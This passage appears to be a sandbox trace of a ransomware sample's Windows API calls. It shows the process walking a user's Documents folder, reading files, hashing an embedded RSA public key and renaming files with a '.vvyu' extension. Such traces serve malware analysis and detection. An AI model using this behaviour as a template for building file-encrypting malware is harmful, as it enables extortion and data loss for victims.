nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.152] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.152] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.152] CloseHandle (hObject=0x584) returned 1 [0192.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x6f4d00 [0192.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0192.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6f4d00 | out: hHeap=0x6a0000) returned 1 [0192.154] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\XvrsId5WMhv8lJp8.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\xvrsid5wmhv8ljp8.ots"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\XvrsId5WMhv8lJp8.ots.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\xvrsid5wmhv8ljp8.ots.vvyu")) returned 1 [0192.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.156] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0192.160] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb060fb0, ftCreationTime.dwHighDateTime=0x1d89ae5, ftLastAccessTime.dwLowDateTime=0x20967730, ftLastAccessTime.dwHighDateTime=0x1d89fd2, ftLastWriteTime.dwLowDateTime=0x20967730, ftLastWriteTime.dwHighDateTime=0x1d89fd2, nFileSizeHigh=0x0, nFileSizeLow=0x1282, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_wgbJ2d7Z.csv", cAlternateFileName="_WGBJ2~1.CSV")) returned 1 [0192.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x751d68 [0192.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.160] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\_wgbJ2d7Z.csv") returned=".csv" [0192.160] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\_wgbJ2d7Z.csv" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\_wgbj2d7z.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.161] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=4738) returned 1 [0192.161] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.164] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x125c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.164] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.169] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.169] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x1282, lpOverlapped=0x0) returned 1 [0192.170] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.170] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.170] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.170] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.170] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea810) returned 1 [0192.171] CryptCreateHash (in: hProv=0x6ea810, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.171] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.171] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.172] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.172] GetLastError () returned 0x0 [0192.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.172] GetLastError () returned 0x0 [0192.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.172] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.172] CryptReleaseContext (hProv=0x6ea810, dwFlags=0x0) returned 1 [0192.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.173] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.173] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.173] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1280) returned 0x2d45778 [0192.173] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d419f8 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ca0 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41a40 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cb8 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ce8 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d48 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d00 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.174] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d48 [0192.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0192.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d00 [0192.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39ce8 [0192.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0192.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0192.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0192.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.178] GetCurrentThreadId () returned 0x264 [0192.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44fc0 [0192.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0192.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.178] GetCurrentThreadId () returned 0x264 [0192.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d48 [0192.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ce8 [0192.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0192.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d00 [0192.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cd0 [0192.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d60 [0192.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0192.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d30 [0192.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d18 [0192.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d78 [0192.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d18 [0192.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0192.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ce8 [0192.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0192.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0192.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41a40 | out: hHeap=0x6a0000) returned 1 [0192.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 